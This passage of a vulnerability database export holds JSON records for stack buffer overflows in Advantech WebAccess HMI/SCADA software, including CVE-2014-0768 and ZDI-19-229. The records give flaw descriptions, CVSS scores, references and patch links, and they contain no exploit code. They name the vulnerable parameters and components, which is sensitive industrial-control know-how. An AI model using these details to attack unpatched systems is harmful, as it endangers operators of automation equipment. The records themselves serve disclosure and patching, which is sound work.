stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0764" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "BID", "id": "66718" }, { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-68257" } ], "trust": 3.69 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0764", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66718", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201404-170", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02262", "trust": 1.2 }, { "db": "JVNDB", "id": "JVNDB-2014-001975", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2009", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-076", "trust": 0.7 }, { "db": "OSVDB", "id": "105573", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "2B34B2F8-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "1645F628-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7C1A80-463F-11E9-A220-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68257", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "VULHUB", "id": "VHN-68257" }, { "db": "BID", "id": "66718" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "CNNVD", "id": "CNNVD-201404-170" }, { "db": "NVD", "id": "CVE-2014-0764" } ] }, "id": "VAR-201404-0539", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "VULHUB", "id": "VHN-68257" } ], "trust": 1.951177005 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2014-02262" } ] }, "last_update_date": "2024-11-23T21:45:11.486000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Patch for Advantech WebAccess NodeName parameter handling stack buffer overflow vulnerability (CNVD-2014-02262)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44786" }, { "title": "AdvantechWebAccessCHNNode_2014.03.03_3.3.1", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49251" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "CNNVD", "id": "CNNVD-201404-170" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68257" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "NVD", "id": "CVE-2014-0764" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66718" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0764" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0764" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105573" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "VULHUB", "id": "VHN-68257" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "CNNVD", "id": "CNNVD-201404-170" }, { "db": "NVD", "id": "CVE-2014-0764" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-14-076", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02262", "ident": null }, { "db": "VULHUB", "id": "VHN-68257", "ident": null }, { "db": "BID", "id": "66718", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001975", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-170", "ident": null }, { "db": "NVD", "id": "CVE-2014-0764", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1", "ident": null }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-076", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02262", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68257", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66718", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001975", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-170", "ident": null }, { "date": "2014-04-12T04:37:31.470000", "db": "NVD", "id": "CVE-2014-0764", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-076", "ident": null }, { "date": "2014-04-14T00:00:00", "db": "CNVD", "id": "CNVD-2014-02262", "ident": null }, { "date": "2015-07-09T00:00:00", "db": "VULHUB", "id": "VHN-68257", "ident": null }, { "date": "2014-04-17T00:40:00", "db": "BID", "id": "66718", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001975", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-170", "ident": null }, { "date": "2024-11-21T02:02:46.110000", "db": "NVD", "id": "CVE-2014-0764", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-170" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001975" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201404-170" } ], "trust": 1.2 } }
var-201404-0543
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode2 argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" }, { "_id": null, "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" } ], "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "BID", "id": "66732" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "CNNVD", "id": "CNNVD-201404-174" }, { "db": "NVD", "id": "CVE-2014-0768" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001979" } ] }, "credits": { "_id": null, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-116" } ], "trust": 0.7 }, "cve": "CVE-2014-0768", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0768", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02245", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "3013e55a-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "167bb862-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68261", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0768", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0768", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0768", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02245", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-174", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68261", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "VULHUB", "id": "VHN-68261" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "CNNVD", "id": "CNNVD-201404-174" }, { "db": "NVD", "id": "CVE-2014-0768" } ] }, "description": { "_id": null, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode2 argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0768" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "BID", "id": "66732" }, { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68261" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0768", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66732", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201404-174", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-02245", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001979", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2013", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-116", "trust": 0.7 }, { "db": "OSVDB", "id": "105567", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "3013E55A-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "167BB862-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68261", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "VULHUB", "id": "VHN-68261" }, { "db": "BID", "id": "66732" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "CNNVD", "id": "CNNVD-201404-174" }, { "db": "NVD", "id": "CVE-2014-0768" } ] }, "id": "VAR-201404-0543", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "VULHUB", "id": "VHN-68261" } ], "trust": 1.7511770050000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02245" } ] }, "last_update_date": "2024-11-23T21:45:11.287000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess userName parameter handles patch buffer overflow vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44784" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68261" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "NVD", "id": "CVE-2014-0768" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66732" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0768" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0768" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105567" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-116" }, { "db": "CNVD", "id": "CNVD-2014-02245" }, { "db": "VULHUB", "id": "VHN-68261" }, { "db": "JVNDB", "id": "JVNDB-2014-001979" }, { "db": "CNNVD", "id": "CNNVD-201404-174" }, { "db": "NVD", "id": "CVE-2014-0768" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-116", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02245", "ident": null }, { "db": "VULHUB", "id": "VHN-68261", "ident": null }, { "db": "BID", "id": "66732", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001979", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-174", "ident": null }, { "db": "NVD", "id": "CVE-2014-0768", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-24T00:00:00", "db": "ZDI", "id": "ZDI-14-116", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02245", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68261", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66732", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001979", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-174", "ident": null }, { "date": "2014-04-12T04:37:31.597000", "db": "NVD", "id": "CVE-2014-0768", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-04-24T00:00:00", "db": "ZDI", "id": "ZDI-14-116", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02245", "ident": null }, { "date": "2015-07-09T00:00:00", "db": "VULHUB", "id": "VHN-68261", "ident": null }, { "date": "2014-09-03T14:26:00", "db": "BID", "id": "66732", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001979", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-174", "ident": null }, { "date": "2024-11-21T02:02:46.533000", "db": "NVD", "id": "CVE-2014-0768", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-174" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001979" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "3013e55a-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "167bb862-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-174" } ], "trust": 1.0 } }
var-201902-0943
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within spchapi.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201902-0943", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-19-229", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-229", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within spchapi.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7878", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-229", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ] }, "id": "VAR-201902-0943", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:10:29.035000Z", "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-19-229" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-02-28T00:00:00", "db": "ZDI", "id": "ZDI-19-229" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": 